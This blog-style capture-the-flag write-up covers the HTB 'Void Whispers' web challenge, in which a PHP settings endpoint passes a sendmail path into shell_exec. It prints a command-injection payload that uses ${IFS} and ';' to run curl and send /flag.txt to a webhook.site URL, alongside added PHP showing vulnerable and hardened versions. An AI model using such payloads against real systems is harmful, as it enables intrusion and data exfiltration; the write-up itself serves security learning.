# Void Whispers

## OVERVIEW

---

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1758177226313/e31448bd-e94b-4159-b74e-ea8541341237.png align="center")

Download the given files from the site, open the instance, and let’s check it out.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1758177264857/d422eb16-4d2a-4768-873c-b59ebc0585b9.png align="center")

Hmm, the site allows us to send mail through a sendmail path, which looks kind of suspicious.

Let’s check the downloaded files to see whether there is any vulnerability there.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1758177327958/cf141b72-0eff-443a-98f0-dc05ca32fd77.png align="center")

We found it!!

The `updateSetting` endpoint (`challenge/controllers/IndexController.php`) reads a user-controlled `sendMailPath` POST parameter and blindly interpolates it into a `shell_exec("which $sendMailPath")` call.

Because the application executes a shell command with unsanitized input, this results in a **command injection vulnerability**. The developer attempted to block spaces with `preg_match('/\s/')`, but this is insufficient: attackers can use `${IFS}` in place of whitespace, and shell metacharacters (e.g. `;`) to chain commands.
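The flaw described above, shown next to two hardened alternatives, as an added example rather than the challenge's source: the function names, the allowlist entries and the sample inputs are assumptions made for illustration.

```php
<?php
// Added illustration: function names and the allowlist are assumptions,
// not code taken from the challenge.

// Pattern the write-up describes: whitespace-only filter, then shell interpolation.
function lookupVulnerable(string $sendMailPath): ?string
{
    if (preg_match('/\s/', $sendMailPath)) {
        return null; // only literal whitespace is rejected
    }
    // ';', '$(...)' and '${IFS}' contain no whitespace, so they reach the shell.
    $out = shell_exec("which $sendMailPath");
    return is_string($out) ? trim($out) : null;
}

// Hardened, option 1: no shell. Exact allowlist match plus a filesystem check.
const ALLOWED_SENDMAIL_PATHS = ['/usr/sbin/sendmail', '/usr/bin/msmtp']; // assumed

function lookupAllowlisted(string $sendMailPath): ?string
{
    if (!in_array($sendMailPath, ALLOWED_SENDMAIL_PATHS, true)) {
        return null;
    }
    $real = realpath($sendMailPath);
    return ($real !== false && is_file($real) && is_executable($real)) ? $real : null;
}

// Hardened, option 2: if the shell lookup must stay, restrict the characters
// and quote the value so the shell sees exactly one argument.
function lookupQuoted(string $sendMailPath): ?string
{
    if (!preg_match('#^/[A-Za-z0-9._/-]+$#D', $sendMailPath)) {
        return null;
    }
    $out = shell_exec('which ' . escapeshellarg($sendMailPath));
    return is_string($out) && trim($out) !== '' ? trim($out) : null;
}

// Constructed inputs: a plain path, and one using ';' and ${IFS} with a harmless echo.
$samples = ['/usr/sbin/sendmail', '/usr/sbin/sendmail;echo${IFS}injected'];
foreach ($samples as $s) {
    printf(
        "%s\n  whitespace filter blocks: %s\n  allowlist accepts: %s\n  quoted lookup accepts: %s\n",
        $s,
        var_export((bool) preg_match('/\s/', $s), true),
        var_export(lookupAllowlisted($s) !== null, true),
        var_export(lookupQuoted($s) !== null, true)
    );
}
```

Whether the plain path is accepted depends on that binary existing on the host; the second input passes the whitespace filter but is rejected by both hardened lookups.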

So we will use this payload:

```text
/usr/sbin/sendmail;curl${IFS}<WEBHOOK-UNIQUE-URL>?flag=$(cat${IFS}/flag.txt)
```

Now let me explain what a webhook is and where you can get your own unique URL:

A **webhook** is simply an HTTP endpoint that accepts incoming requests (GET/POST/etc.) so one system can notify or send data to another.

And **webhook.site** is a public online tool that generates a **unique temporary URL** for you. When someone (or something) makes an HTTP request to that URL, webhook.site records and displays the full request so you can inspect it.

To obtain your unique URL, visit this site: [https://webhook.site](https://webhook.site) *(no sign-up needed)*

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1758181094633/9efbe06f-850a-4d2c-a3d4-7d91dd33a1bf.png align="center")

You can also use **ngrok** as an alternative to webhook.site.

Now let’s enter our payload in the Sendmail Path parameter.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1758181187447/86a2311c-f0d7-4582-bd62-66813037e587.png align="center")

So this payload `/usr/sbin/sendmail;curl${IFS}https://webhook.site/<id>?flag=$(cat${IFS}/flag.txt)` will cause the server to run `curl` and exfiltrate `/flag.txt` to my webhook.

Let’s send this and see what we get.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1758181822396/2a560dde-56c0-4aac-8f5c-c924bab851bb.png align="center")

We got the message "Config updated successfully!"

Now let’s check webhook.site to see whether we got the flag.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1758181874093/4d4f887f-6a5c-4a2c-9c9d-bc081d2af6c6.png align="center")

Voilà!! We got the flag in the query strings *(enter the flag in the flag format, which is HTB{}, as the curly braces are missing from the flag)*

## **WE FINALLY DID IT !!!! CHALLENGE SOLVED !!**

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1758181996070/5476b185-4227-4881-9b19-e8c3ac68342e.png align="center")

For any query or problem, either leave a comment or contact us at [**reapsec.com**](http://reapsec.com/)

**THANKS FOR READING !!!**
